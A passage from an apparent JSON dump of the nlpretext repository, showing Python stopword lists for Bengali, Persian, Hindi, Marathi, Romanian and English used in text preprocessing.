\"শুরু\",\n        \"সঙ্গে\",\n        \"সব\",\n        \"সহ\",\n        \"সাধারণ\",\n        \"সামনে\",\n        \"সি\",\n        \"সে\",\n        \"সেই\",\n        \"হতে\",\n        \"হাজার\",\n        \"হয়\",\n    ],\n    \"fa\": [\n        \"آباد\",\n        \"آره\",\n        \"آری\",\n        \"آمد\",\n        \"آمده\",\n        \"آن\",\n        \"آنان\",\n        \"آنجا\",\n        \"آنكه\",\n        \"آنها\",\n        \"آنچه\",\n        \"آورد\",\n        \"آورده\",\n        \"آيد\",\n        \"آیا\",\n        \"اثرِ\",\n        \"از\",\n        \"است\",\n        \"استفاده\",\n        \"اش\",\n        \"اكنون\",\n        \"البته\",\n        \"البتّه\",\n        \"ام\",\n        \"اما\",\n        \"امروز\",\n        \"امسال\",\n        \"اند\",\n        \"انکه\",\n        \"او\",\n        \"اول\",\n        \"اي\",\n        \"ايشان\",\n        \"ايم\",\n        \"اين\",\n        \"اينكه\",\n        \"اگر\",\n        \"با\",\n        \"بار\",\n        \"بارة\",\n        \"باره\",\n        \"باشد\",\n        \"باشند\",\n        \"باشيم\",\n        \"بالا\",\n        \"بالایِ\",\n        \"بايد\",\n        \"بدون\",\n        \"بر\",\n        \"برابرِ\",\n        \"براساس\",\n        \"براي\",\n        \"برایِ\",\n        \"برخوردار\",\n        \"برخي\",\n        \"برداري\",\n        \"بروز\",\n        \"بسيار\",\n        \"بسياري\",\n        \"بعد\",\n        \"بعری\",\n        \"بعضي\",\n        \"بلكه\",\n        \"بله\",\n        \"بلکه\",\n        \"بلی\",\n        \"بنابراين\",\n        \"بندي\",\n        \"به\",\n        \"بهترين\",\n        \"بود\",\n        \"بودن\",\n        \"بودند\",\n        \"بوده\",\n        \"بي\",\n        \"بيست\",\n        \"بيش\",\n        \"بيشتر\",\n        \"بيشتري\",\n        \"بين\",\n        \"بی\",\n        \"بیرونِ\",\n        \"تا\",\n        \"تازه\",\n        \"تاكنون\",\n        \"تان\",\n        \"تحت\",\n        \"تر\",\n        \"ترين\",\n        \"تمام\",\n        \"تمامي\",\n        \"تنها\",\n        \"تواند\",\n        \"توانند\",\n        \"توسط\",\n        \"تولِ\",\n        \"تویِ\",\n        \"جا\",\n        \"جاي\",\n        \"جايي\",\n        \"جدا\",\n        \"جديد\",\n        \"جريان\",\n        \"جز\",\n        \"جلوگيري\",\n        \"جلویِ\",\n        \"حتي\",\n        \"حدودِ\",\n        \"حق\",\n        \"خارجِ\",\n        \"خدمات\",\n        \"خواست\",\n        \"خواهد\",\n        \"خواهند\",\n        \"خواهيم\",\n        \"خود\",\n        \"خويش\",\n        \"خیاه\",\n        \"داد\",\n        \"دادن\",\n        \"دادند\",\n        \"داده\",\n        \"دارد\",\n        \"دارند\",\n        \"داريم\",\n        \"داشت\",\n        \"داشتن\",\n        \"داشتند\",\n        \"داشته\",\n        \"دانست\",\n        \"دانند\",\n        \"در\",\n        \"درباره\",\n        \"دنبالِ\",\n        \"ده\",\n        \"دهد\",\n        \"دهند\",\n        \"دو\",\n        \"دوم\",\n        \"ديده\",\n        \"ديروز\",\n        \"ديگر\",\n        \"ديگران\",\n        \"ديگري\",\n        \"دیگر\",\n        \"را\",\n        \"راه\",\n        \"رفت\",\n        \"رفته\",\n        \"روب\",\n        \"روزهاي\",\n        \"روي\",\n        \"رویِ\",\n        \"ريزي\",\n        \"زياد\",\n        \"زير\",\n        \"زيرا\",\n        \"زیرِ\",\n        \"سابق\",\n        \"ساخته\",\n        \"سازي\",\n        \"سراسر\",\n        \"سریِ\",\n        \"سعي\",\n        \"سمتِ\",\n        \"سوم\",\n        \"سوي\",\n        \"سویِ\",\n        \"سپس\",\n        \"شان\",\n        \"شايد\",\n        \"شد\",\n        \"شدن\",\n        \"شدند\",\n        \"شده\",\n        \"شش\",\n        \"شما\",\n        \"شناسي\",\n        \"شود\",\n        \"شوند\",\n        \"صورت\",\n        \"ضدِّ\",\n        \"ضمن\",\n        \"طبقِ\",\n        \"طريق\",\n        \"طور\",\n        \"طي\",\n        \"عقبِ\",\n        \"علّتِ\",\n        \"عنوانِ\",\n        \"غير\",\n        \"فقط\",\n        \"فكر\",\n        \"فوق\",\n        \"قابل\",\n        \"قبل\",\n        \"قصدِ\",\n        \"كرد\",\n        \"كردم\",\n        \"كردن\",\n        \"كردند\",\n        \"كرده\",\n        \"كسي\",\n        \"كل\",\n        \"كمتر\",\n        \"كند\",\n        \"كنم\",\n        \"كنند\",\n        \"كنيد\",\n        \"كنيم\",\n        \"كه\",\n        \"لطفاً\",\n        \"ما\",\n        \"مان\",\n        \"مانند\",\n        \"مانندِ\",\n        \"مثل\",\n        \"مثلِ\",\n        \"مختلف\",\n        \"مدّتی\",\n        \"مردم\",\n        \"مرسی\",\n        \"مقابل\",\n        \"من\",\n        \"مورد\",\n        \"مي\",\n        \"ميليارد\",\n        \"ميليون\",\n        \"مگر\",\n        \"ناشي\",\n        \"نام\",\n        \"نبايد\",\n        \"نبود\",\n        \"نخست\",\n        \"نخستين\",\n        \"نخواهد\",\n        \"ندارد\",\n        \"ندارند\",\n        \"نداشته\",\n        \"نزديك\",\n        \"نزدِ\",\n        \"نزدیکِ\",\n        \"نشان\",\n        \"نشده\",\n        \"نظير\",\n        \"نكرده\",\n        \"نمايد\",\n        \"نمي\",\n        \"نه\",\n        \"نوعي\",\n        \"نيز\",\n        \"نيست\",\n        \"ها\",\n        \"هاي\",\n        \"هايي\",\n        \"هر\",\n        \"هرگز\",\n        \"هزار\",\n        \"هست\",\n        \"هستند\",\n        \"هستيم\",\n        \"هفت\",\n        \"هم\",\n        \"همان\",\n        \"همه\",\n        \"همواره\",\n        \"همين\",\n        \"همچنان\",\n        \"همچنين\",\n        \"همچون\",\n        \"همین\",\n        \"هنوز\",\n        \"هنگام\",\n        \"هنگامِ\",\n        \"هنگامی\",\n        \"هيچ\",\n        \"هیچ\",\n        \"و\",\n        \"وسطِ\",\n        \"وقتي\",\n        \"وقتیکه\",\n        \"ولی\",\n        \"وي\",\n        \"وگو\",\n        \"يا\",\n        \"يابد\",\n        \"يك\",\n        \"يكديگر\",\n        \"يكي\",\n        \"ّه\",\n        \"پاعینِ\",\n        \"پس\",\n        \"پنج\",\n        \"پيش\",\n        \"پیش\",\n        \"پیشِ\",\n        \"چرا\",\n        \"چطور\",\n        \"چند\",\n        \"چندین\",\n        \"چنين\",\n        \"چه\",\n        \"چهار\",\n        \"چون\",\n        \"چيزي\",\n        \"چگونه\",\n        \"چیز\",\n        \"چیزی\",\n        \"چیست\",\n        \"کجا\",\n        \"کجاست\",\n        \"کدام\",\n        \"کس\",\n        \"کسی\",\n        \"کنارِ\",\n        \"که\",\n        \"کَی\",\n        \"کی\",\n        \"گذاري\",\n        \"گذاشته\",\n        \"گردد\",\n        \"گرفت\",\n        \"گرفته\",\n        \"گروهي\",\n        \"گفت\",\n        \"گفته\",\n        \"گويد\",\n        \"گويند\",\n        \"گيرد\",\n        \"گيري\",\n        \"یا\",\n        \"یک\",\n    ],\n    \"hi\": [\n        \"अंदर\",\n        \"अत\",\n        \"अदि\",\n        \"अप\",\n        \"अपना\",\n        \"अपनि\",\n        \"अपनी\",\n        \"अपने\",\n        \"अभि\",\n        \"अभी\",\n        \"आदि\",\n        \"आप\",\n        \"इंहिं\",\n        \"इंहें\",\n        \"इंहों\",\n        \"इतयादि\",\n        \"इत्यादि\",\n        \"इन\",\n        \"इनका\",\n        \"इन्हीं\",\n        \"इन्हें\",\n        \"इन्हों\",\n        \"इस\",\n        \"इसका\",\n        \"इसकि\",\n        \"इसकी\",\n        \"इसके\",\n        \"इसमें\",\n        \"इसि\",\n        \"इसी\",\n        \"इसे\",\n        \"उंहिं\",\n        \"उंहें\",\n        \"उंहों\",\n        \"उन\",\n        \"उनका\",\n        \"उनकि\",\n        \"उनकी\",\n        \"उनके\",\n        \"उनको\",\n        \"उन्हीं\",\n        \"उन्हें\",\n        \"उन्हों\",\n        \"उस\",\n        \"उसके\",\n        \"उसि\",\n        \"उसी\",\n        \"उसे\",\n        \"एक\",\n        \"एवं\",\n        \"एस\",\n        \"एसे\",\n        \"ऐसे\",\n        \"ओर\",\n        \"और\",\n        \"कइ\",\n        \"कई\",\n        \"कर\",\n        \"करता\",\n        \"करते\",\n        \"करना\",\n        \"करने\",\n        \"करें\",\n        \"कहते\",\n        \"कहा\",\n        \"का\",\n        \"काफि\",\n        \"काफ़ी\",\n        \"कि\",\n        \"किंहें\",\n        \"किंहों\",\n        \"कितना\",\n        \"किन्हें\",\n        \"किन्हों\",\n        \"किया\",\n        \"किर\",\n        \"किस\",\n        \"किसि\",\n        \"किसी\",\n        \"किसे\",\n        \"की\",\n        \"कुछ\",\n        \"कुल\",\n        \"के\",\n        \"को\",\n        \"कोइ\",\n        \"कोई\",\n        \"कोन\",\n        \"कोनसा\",\n        \"कौन\",\n        \"कौनसा\",\n        \"गया\",\n        \"घर\",\n        \"जब\",\n        \"जहाँ\",\n        \"जहां\",\n        \"जा\",\n        \"जिंहें\",\n        \"जिंहों\",\n        \"जितना\",\n        \"जिधर\",\n        \"जिन\",\n        \"जिन्हें\",\n        \"जिन्हों\",\n        \"जिस\",\n        \"जिसे\",\n        \"जीधर\",\n        \"जेसा\",\n        \"जेसे\",\n        \"जैसा\",\n        \"जैसे\",\n        \"जो\",\n        \"तक\",\n        \"तब\",\n        \"तरह\",\n        \"तिंहें\",\n        \"तिंहों\",\n        \"तिन\",\n        \"तिन्हें\",\n        \"तिन्हों\",\n        \"तिस\",\n        \"तिसे\",\n        \"तो\",\n        \"था\",\n        \"थि\",\n        \"थी\",\n        \"थे\",\n        \"दबारा\",\n        \"दवारा\",\n        \"दिया\",\n        \"दुसरा\",\n        \"दुसरे\",\n        \"दूसरे\",\n        \"दो\",\n        \"द्वारा\",\n        \"न\",\n        \"नहिं\",\n        \"नहीं\",\n        \"ना\",\n        \"निचे\",\n        \"निहायत\",\n        \"नीचे\",\n        \"ने\",\n        \"पर\",\n        \"पहले\",\n        \"पुरा\",\n        \"पूरा\",\n        \"पे\",\n        \"फिर\",\n        \"बनि\",\n        \"बनी\",\n        \"बहि\",\n        \"बही\",\n        \"बहुत\",\n        \"बाद\",\n        \"बाला\",\n        \"बिलकुल\",\n        \"भि\",\n        \"भितर\",\n        \"भी\",\n        \"भीतर\",\n        \"मगर\",\n        \"मानो\",\n        \"मे\",\n        \"में\",\n        \"यदि\",\n        \"यह\",\n        \"यहाँ\",\n        \"यहां\",\n        \"यहि\",\n        \"यही\",\n        \"या\",\n        \"यिह\",\n        \"ये\",\n        \"रखें\",\n        \"रवासा\",\n        \"रहा\",\n        \"रहे\",\n        \"ऱ्वासा\",\n        \"लिए\",\n        \"लिये\",\n        \"लेकिन\",\n        \"व\",\n        \"वगेरह\",\n        \"वरग\",\n        \"वर्ग\",\n        \"वह\",\n        \"वहाँ\",\n        \"वहां\",\n        \"वहिं\",\n        \"वहीं\",\n        \"वाले\",\n        \"वुह\",\n        \"वे\",\n        \"वग़ैरह\",\n        \"संग\",\n        \"सकता\",\n        \"सकते\",\n        \"सबसे\",\n        \"सभि\",\n        \"सभी\",\n        \"साथ\",\n        \"साबुत\",\n        \"साभ\",\n        \"सारा\",\n        \"से\",\n        \"सो\",\n        \"हि\",\n        \"ही\",\n        \"हुअ\",\n        \"हुआ\",\n        \"हुइ\",\n        \"हुई\",\n        \"हुए\",\n        \"हे\",\n        \"हें\",\n        \"है\",\n        \"हैं\",\n        \"हो\",\n        \"होता\",\n        \"होति\",\n        \"होती\",\n        \"होते\",\n        \"होना\",\n        \"होने\",\n    ],\n    \"mr\": [\n        \"अधिक\",\n        \"अनेक\",\n        \"अशी\",\n        \"असलयाचे\",\n        \"असलेल्या\",\n        \"असा\",\n        \"असून\",\n        \"असे\",\n        \"आज\",\n        \"आणि\",\n        \"आता\",\n        \"आपल्या\",\n        \"आला\",\n        \"आली\",\n        \"आले\",\n        \"आहे\",\n        \"आहेत\",\n        \"एक\",\n        \"एका\",\n        \"कमी\",\n        \"करणयात\",\n        \"करून\",\n        \"का\",\n        \"काम\",\n        \"काय\",\n        \"काही\",\n        \"किवा\",\n        \"की\",\n        \"केला\",\n        \"केली\",\n        \"केले\",\n        \"कोटी\",\n        \"गेल्या\",\n        \"घेऊन\",\n        \"जात\",\n        \"झाला\",\n        \"झाली\",\n        \"झाले\",\n        \"झालेल्या\",\n        \"टा\",\n        \"डॉ\",\n        \"तर\",\n        \"तरी\",\n        \"तसेच\",\n        \"ता\",\n        \"ती\",\n        \"तीन\",\n        \"ते\",\n        \"तो\",\n        \"त्या\",\n        \"त्याचा\",\n        \"त्याची\",\n        \"त्याच्या\",\n        \"त्याना\",\n        \"त्यानी\",\n        \"त्यामुळे\",\n        \"त्री\",\n        \"दिली\",\n        \"दोन\",\n        \"न\",\n        \"नाही\",\n        \"निर्ण्य\",\n        \"पण\",\n        \"पम\",\n        \"परयतन\",\n        \"पाटील\",\n        \"म\",\n        \"मात्र\",\n        \"माहिती\",\n        \"मी\",\n        \"मुबी\",\n        \"म्हणजे\",\n        \"म्हणाले\",\n        \"म्हणून\",\n        \"या\",\n        \"याचा\",\n        \"याची\",\n        \"याच्या\",\n        \"याना\",\n        \"यानी\",\n        \"येणार\",\n        \"येत\",\n        \"येथील\",\n        \"येथे\",\n        \"लाख\",\n        \"व\",\n        \"व्यकत\",\n        \"सर्व\",\n        \"सागित्ले\",\n        \"सुरू\",\n        \"हजार\",\n        \"हा\",\n        \"ही\",\n        \"हे\",\n        \"होणार\",\n        \"होत\",\n        \"होता\",\n        \"होती\",\n        \"होते\",\n    ],\n    \"ro\": [\n        \"acea\",\n        \"aceasta\",\n        \"această\",\n        \"aceea\",\n        \"acei\",\n        \"aceia\",\n        \"acel\",\n        \"acela\",\n        \"acele\",\n        \"acelea\",\n        \"acest\",\n        \"acesta\",\n        \"aceste\",\n        \"acestea\",\n        \"aceşti\",\n        \"aceştia\",\n        \"acolo\",\n        \"acord\",\n        \"acum\",\n        \"ai\",\n        \"aia\",\n        \"aibă\",\n        \"aici\",\n        \"al\",\n        \"ale\",\n        \"alea\",\n        \"altceva\",\n        \"altcineva\",\n        \"am\",\n        \"ar\",\n        \"are\",\n        \"asemenea\",\n        \"asta\",\n        \"astea\",\n        \"astăzi\",\n        \"asupra\",\n        \"au\",\n        \"avea\",\n        \"avem\",\n        \"aveţi\",\n        \"azi\",\n        \"aş\",\n        \"aşadar\",\n        \"aţi\",\n        \"bine\",\n        \"bucur\",\n        \"bună\",\n        \"ca\",\n        \"care\",\n        \"caut\",\n        \"ce\",\n        \"cel\",\n        \"ceva\",\n        \"chiar\",\n        \"cinci\",\n        \"cine\",\n        \"cineva\",\n        \"contra\",\n        \"cu\",\n        \"cum\",\n        \"cumva\",\n        \"curând\",\n        \"curînd\",\n        \"când\",\n        \"cât\",\n        \"câte\",\n        \"câtva\",\n        \"câţi\",\n        \"cînd\",\n        \"cît\",\n        \"cîte\",\n        \"cîtva\",\n        \"cîţi\",\n        \"că\",\n        \"căci\",\n        \"cărei\",\n        \"căror\",\n        \"cărui\",\n        \"către\",\n        \"da\",\n        \"dacă\",\n        \"dar\",\n        \"datorită\",\n        \"dată\",\n        \"dau\",\n        \"de\",\n        \"deci\",\n        \"deja\",\n        \"deoarece\",\n        \"departe\",\n        \"deşi\",\n        \"din\",\n        \"dinaintea\",\n        \"dintr-\",\n        \"dintre\",\n        \"doi\",\n        \"doilea\",\n        \"două\",\n        \"drept\",\n        \"după\",\n        \"dă\",\n        \"ea\",\n        \"ei\",\n        \"el\",\n        \"ele\",\n        \"eram\",\n        \"este\",\n        \"eu\",\n        \"eşti\",\n        \"face\",\n        \"fata\",\n        \"fi\",\n        \"fie\",\n        \"fiecare\",\n        \"fii\",\n        \"fim\",\n        \"fiu\",\n        \"fiţi\",\n        \"frumos\",\n        \"fără\",\n        \"graţie\",\n        \"halbă\",\n        \"iar\",\n        \"ieri\",\n        \"la\",\n        \"le\",\n        \"li\",\n        \"lor\",\n        \"lui\",\n        \"lângă\",\n        \"lîngă\",\n        \"mai\",\n        \"mea\",\n        \"mei\",\n        \"mele\",\n        \"mereu\",\n        \"meu\",\n        \"mi\",\n        \"mie\",\n        \"mine\",\n        \"mult\",\n        \"multă\",\n        \"mulţi\",\n        \"mulţumesc\",\n        \"mâine\",\n        \"mîine\",\n        \"mă\",\n        \"ne\",\n        \"nevoie\",\n        \"nici\",\n        \"nicăieri\",\n        \"nimeni\",\n        \"nimeri\",\n        \"nimic\",\n        \"nişte\",\n        \"noastre\",\n        \"noastră\",\n        \"noi\",\n        \"noroc\",\n        \"nostru\",\n        \"nouă\",\n        \"noştri\",\n        \"nu\",\n        \"opt\",\n        \"ori\",\n        \"oricare\",\n        \"orice\",\n        \"oricine\",\n        \"oricum\",\n        \"oricând\",\n        \"oricât\",\n        \"oricînd\",\n        \"oricît\",\n        \"oriunde\",\n        \"patra\",\n        \"patru\",\n        \"patrulea\",\n        \"pe\",\n        \"pentru\",\n        \"peste\",\n        \"pic\",\n        \"poate\",\n        \"pot\",\n        \"prea\",\n        \"prima\",\n        \"primul\",\n        \"prin\",\n        \"printr-\",\n        \"puţin\",\n        \"puţina\",\n        \"puţină\",\n        \"până\",\n        \"pînă\",\n        \"rog\",\n        \"sa\",\n        \"sale\",\n        \"sau\",\n        \"se\",\n        \"spate\",\n        \"spre\",\n        \"sub\",\n        \"sunt\",\n        \"suntem\",\n        \"sunteţi\",\n        \"sută\",\n        \"sînt\",\n        \"sîntem\",\n        \"sînteţi\",\n        \"să\",\n        \"săi\",\n        \"său\",\n        \"ta\",\n        \"tale\",\n        \"te\",\n        \"timp\",\n        \"tine\",\n        \"toate\",\n        \"toată\",\n        \"tot\",\n        \"totuşi\",\n        \"toţi\",\n        \"trei\",\n        \"treia\",\n        \"treilea\",\n        \"tu\",\n        \"tăi\",\n        \"tău\",\n        \"un\",\n        \"una\",\n        \"unde\",\n        \"undeva\",\n        \"unei\",\n        \"uneia\",\n        \"unele\",\n        \"uneori\",\n        \"unii\",\n        \"unor\",\n        \"unora\",\n        \"unu\",\n        \"unui\",\n        \"unuia\",\n        \"unul\",\n        \"vi\",\n        \"voastre\",\n        \"voastră\",\n        \"voi\",\n        \"vostru\",\n        \"vouă\",\n        \"voştri\",\n        \"vreme\",\n        \"vreo\",\n        \"vreun\",\n        \"vă\",\n        \"zece\",\n        \"zero\",\n        \"zi\",\n        \"zice\",\n        \"îi\",\n        \"îl\",\n        \"îmi\",\n        \"împotriva\",\n        \"în\",\n        \"înainte\",\n        \"înaintea\",\n        \"încotro\",\n        \"încât\",\n        \"încît\",\n        \"între\",\n        \"întrucât\",\n        \"întrucît\",\n        \"îţi\",\n        \"ăla\",\n        \"ălea\",\n        \"ăsta\",\n        \"ăstea\",\n        \"ăştia\",\n        \"şapte\",\n        \"şase\",\n        \"şi\",\n        \"ştiu\",\n        \"ţi\",\n        \"ţie\",\n    ],\n    \"en\": [\n        \"a\",\n        \"a's\",\n        \"able\",\n        \"about\",\n        \"above\",\n        \"according\",\n        \"accordingly\",\n        \"across\",\n        \"actually\",\n        \"after\",\n        \"afterwards\",\n        \"again\",\n        \"against\",\n        \"ain't\",\n        \"all\",\n        \"allow\",\n        \"allows\",\n        \"almost\",\n        \"alone\",\n        \"along\",\n        \"already\",\n        \"also\",\n        \"although\",\n        \"always\",\n        \"am\",\n        \"among\",\n        \"amongst\",\n        \"an\",\n        \"and\",\n        \"another\",\n        \"any\",\n        \"anybody\",\n        \"anyhow\",\n        \"anyone\",\n        \"anything\",\n        \"anyway\",\n        \"anyways\",\n        \"anywhere\",\n        \"apart\",\n        \"appear\",\n        \"appreciate\",\n        \"appropriate\",\n        \"are\",\n        \"aren't\",\n        \"around\",\n        \"as\",\n        \"aside\",\n        \"ask\",\n        \"asking\",\n        \"associated\",\n        \"at\",\n        \"available\",\n        \"away\",\n        \"awfully\",\n        \"b\",\n        \"be\",\n        \"became\",\n        \"because\",\n        \"become\",\n        \"becomes\",\n        \"becoming\",\n        \"been\",\n        \"before\",\n        \"beforehand\",\n        \"behind\",\n        \"being\",\n        \"believe\",\n        \"below\",\n        \"beside\",\n        \"besides\",\n        \"best\",\n        \"better\",\n        \"between\",\n        \"beyond\",\n        \"both\",\n        \"brief\",\n        \"but\",\n        \"by\",\n        \"c\",\n        \"c'mon\",\n        \"c's\",\n        \"came\",\n        \"can\",\n        \"can't\",\n        \"cannot\",\n        \"cant\",\n        \"cause\",\n        \"causes\",\n        \"certain\",\n        \"certainly\",\n        \"changes\",\n        \"clearly\",\n        \"co\",\n        \"com\",\n        \"come\",\n        \"comes\",\n        \"concerning\",\n        \"consequently\",\n        \"consider\",\n        \"considering\",\n        \"contain\",\n        \"containing\",\n        \"contains\",\n        \"corresponding\",\n        \"could\",\n        \"couldn't\",\n        \"course\",\n        \"currently\",\n        \"d\",\n        \"definitely\",\n        \"described\",\n        \"despite\",\n        \"did\",\n        \"didn't\",\n        \"different\",\n        \"do\",\n        \"does\",\n        \"doesn't\",\n        \"doing\",\n        \"don't\",\n        \"done\",\n        \"down\",\n        \"downwards\",\n        \"during\",\n        \"e\",\n        \"each\",\n        \"edu\",\n        \"eg\",\n        \"eight\",\n        \"either\",\n        \"else\",\n        \"elsewhere\",\n        \"enough\",\n        \"entirely\",\n        \"especially\",\n        \"et\",\n        \"etc\",\n        \"even\",\n        \"ever\",\n        \"every\",\n        \"everybody\",\n        \"everyone\",\n        \"everything\",\n        \"everywhere\",\n        \"ex\",\n        \"exactly\",\n        \"example\",\n        \"except\",\n        \"f\",\n        \"far\",\n        \"few\",\n        \"fifth\",\n        \"first\",\n        \"five\",\n        \"followed\",\n        \"following\",\n        \"follows\",\n        \"for\",\n        \"former\",\n        \"formerly\",\n        \"forth\",\n        \"four\",\n        \"from\",\n        \"further\",\n        \"furthermore\",\n        \"g\",\n        \"get\",\n        \"gets\",\n        \"getting\",\n        \"given\",\n        \"gives\",\n        \"go\",\n        \"goes\",\n        \"going\",\n        \"gone\",\n        \"got\",\n        \"gotten\",\n        \"greetings\",\n        \"h\",\n        \"had\",\n        \"hadn't\",\n        \"happens\",\n        \"hardly\",\n        \"has\",\n        \"hasn't\",\n        \"have\",\n        \"haven't\",\n        \"having\",\n        \"he\",\n        \"he's\",\n        \"hello\",\n        \"help\",\n        \"hence\",\n        \"her\",\n        \"here\",\n        \"here's\",\n        \"hereafter\",\n        \"hereby\",\n        \"herein\",\n        \"hereupon\",\n        \"hers\",\n        \"herself\",\n        \"hi\",\n        \"him\",\n        \"himself\",\n        \"his\",\n        \"hither\",\n        \"hopefully\",\n        \"how\",\n        \"howbeit\",\n        \"however\",\n        \"i\",\n        \"i'd\",\n        \"i'll\",\n        \"i'm\",\n        \"i've\",\n        \"ie\",\n        \"if\",\n        \"ignored\",\n        \"immediate\",\n        \"in\",\n        \"inasmuch\",\n        \"inc\",\n        \"indeed\",\n        \"indicate\",\n        \"indicated\",\n        \"indicates\",\n        \"inner\",\n        \"insofar\",\n        \"instead\",\n        \"into\",\n        \"inward\",\n        \"is\",\n        \"isn't\",\n        \"it\",\n        \"it'd\",\n        \"it'll\",\n        \"it's\",\n        \"its\",\n        \"itself\",\n        \"j\",\n        \"just\",\n        \"k\",\n        \"keep\",\n        \"keeps\",\n        \"kept\",\n        \"know\",\n        \"known\",\n        \"knows\",\n        \"l\",\n        \"last\",\n        \"lately\",\n        \"later\",\n        \"latter\",\n        \"latterly\",\n        \"least\",\n        \"less\",\n        \"lest\",\n        \"let\",\n        \"let's\",\n        \"like\",\n        \"liked\",\n        \"likely\",\n        \"little\",\n        \"look\",\n        \"looking\",\n        \"looks\",\n        \"ltd\",\n        \"m\",\n        \"mainly\",\n        \"many\",\n        \"may\",\n        \"maybe\",\n        \"me\",\n        \"mean\",\n        \"meanwhile\",\n        \"merely\",\n        \"might\",\n        \"more\",\n        \"moreover\",\n        \"most\",\n        \"mostly\",\n        \"much\",\n        \"must\",\n        \"my\",\n        \"myself\",\n        \"n\",\n        \"name\",\n        \"namely\",\n        \"nd\",\n        \"near\",\n        \"nearly\",\n        \"necessary\",\n        \"need\",\n        \"needs\",\n        \"neither\",\n        \"never\",\n        \"nevertheless\",\n        \"new\",\n        \"next\",\n        \"nine\",\n        \"no\",\n        \"nobody\",\n        \"non\",\n        \"none\",\n        \"noone\",\n        \"nor\",\n        \"normally\",\n        \"not\",\n        \"nothing\",\n        \"novel\",\n        \"now\",\n        \"nowhere\",\n        \"o\",\n        \"obviously\",\n        \"of\",\n        \"off\",\n        \"often\",\n        \"oh\",\n        \"ok\",\n        \"okay\",\n        \"old\",\n        \"on\",\n        \"once\",\n        \"one\",\n        \"ones\",\n        \"only\",\n        \"onto\",\n        \"or\",\n        \"other\",\n        \"others\",\n        \"otherwise\",\n        \"ought\",\n        \"our\",\n        \"ours\",\n        \"ourselves\",\n        \"out\",\n        \"outside\",\n        \"over\",\n        \"overall\",\n        \"own\",\n        \"p\",\n        \"particular\",\n        \"particularly\",\n        \"per\",\n        \"perhaps\",\n        \"placed\",\n        \"please\",\n        \"plus\",\n        \"possible\",\n        \"presumably\",\n        \"probably\",\n        \"provides\",\n        \"q\",\n        \"que\",\n        \"quite\",\n        \"qv\",\n        \"r\",\n        \"rather\",\n        \"rd\",\n        \"re\",\n        \"really\",\n        \"reasonably\",\n        \"regarding\",\n        \"regardless\",\n        \"regards\",\n        \"relatively\",\n        \"respectively\",\n        \"right\",\n        \"s\",\n        \"said\",\n        \"same\",\n        \"saw\",\n        \"say\",\n        \"saying\",\n        \"says\",\n        \"second\",\n        \"secondly\",\n        \"see\",\n        \"seeing\",\n        \"seem\",\n        \"seemed\",\n        \"seeming\",\n        \"seems\",\n        \"seen\",\n        \"self\",\n        \"selves\",\n        \"sensible\",\n        \"sent\",\n        \"serious\",\n        \"seriously\",\n        \"seven\",\n        \"several\",\n        \"shall\",\n        \"she\",\n        \"should\",\n        \"shouldn't\",\n        \"since\",\n        \"six\",\n        \"so\",\n        \"some\",\n        \"somebody\",\n        \"somehow\",\n        \"someone\",\n        \"something\",\n        \"sometime\",\n        \"sometimes\",\n        \"somewhat\",\n        \"somewhere\",\n        \"soon\",\n        \"sorry\",\n        \"specified\",\n        \"specify\",\n        \"specifying\",\n        \"still\",\n        \"sub\",\n        \"such\",\n        \"sup\",\n        \"sure\",\n        \"t\",\n        \"t's\",\n        \"take\",\n        \"taken\",\n        \"tell\",\n        \"tends\",\n        \"th\",\n        \"than\",\n        \"thank\",\n        \"thanks\",\n        \"thanx\",\n        \"that\",\n        \"that's\",\n        \"thats\",\n        \"the\",\n        \"their\",\n        \"theirs\",\n        \"them\",\n        \"themselves\",\n        \"then\",\n        \"thence\",\n        \"there\",\n        \"there's\",\n        \"thereafter\",\n        \"thereby\",\n        \"therefore\",\n        \"therein\",\n        \"theres\",\n        \"thereupon\",\n        \"these\",\n        \"they\",\n        \"they'd\",\n        \"they'll\",\n        \"they're\",\n        \"they've\",\n        \"think\",\n        \"third\",\n        \"this\",\n        \"thorough\",\n        \"thoroughly\",\n        \"those\",\n        \"though\",\n        \"three\",\n        \"through\",\n        \"throughout\",\n        \"thru\",\n        \"thus\",\n        \"to\",\n        \"together\",\n        \"too\",\n        \"took\",\n        \"toward\",\n        \"towards\",\n        \"tried\",\n        \"tries\",\n        \"truly\",\n        \"try\",\n        \"trying\",\n        \"twice\",\n        \"two\",\n        \"u\",\n        \"un\",\n        \"under\",\n        \"unfortunately\",\n        \"unless\",\n        \"unlikely\",\n        \"until\",\n        \"unto\",\n        \"up\",\n        \"upon\",\n        \"us\",\n        \"use\",\n        \"used\",\n        \"useful\",\n        \"uses\",\n        \"using\",\n        \"usually\",\n        \"uucp\",\n        \"v\",\n        \"value\",\n        \"various\",\n        \"very\",\n        \"via\",\n        \"viz\",\n        \"vs\",\n        \"w\",\n        \"want\",\n        \"wants\",\n        \"was\",\n        \"wasn't\",\n        \"way\",\n        \"we\",\n        \"we'd\",\n        \"we'll\",\n        \"we're\",\n        \"we've\",\n        \"welcome\",\n        \"well\",\n        \"went\",\n        \"were\",\n        \"weren't\",\n        \"what\",\n        \"what's\",\n        \"whatever\",\n        \"when\",\n        \"whence\",\n        \"whenever\",\n        \"where\",\n        \"where's\",\n        \"whereafter\",\n        \"whereas\",\n        \"whereby\",\n        \"wherein\",\n        \"whereupon\",\n        \"wherever\",\n        \"whether\",\n        \"which\",\n        \"while\",\n        \"whither\",\n        \"who\",\n        \"who's\",\n        \"whoever\",\n        \"whole\",\n        \"whom\",\n        \"whose\",\n        \"why\",\n        \"will\",\n        \"willing\",\n        \"wish\",\n        \"with\",\n        \"within\",\n        \"without\",\n        \"won't\",\n        \"wonder\",\n        \"would\",\n        \"wouldn't\",\n        \"x\",\n        \"y\",\n        \"yes\",\n        \"yet\",\n        \"you\",\n        \"you'd\",\n        \"you'll\",\n        \"you're\",\n        \"you've\",\n        \"your\",\n        \"yours\",\n        \"yourself\",\n        \"yourselves\",\n        \"z\",\n        \"zero\",\n    ],\n}\n"
  },
  {
    "path": "nlpretext/_utils/__init__.py",
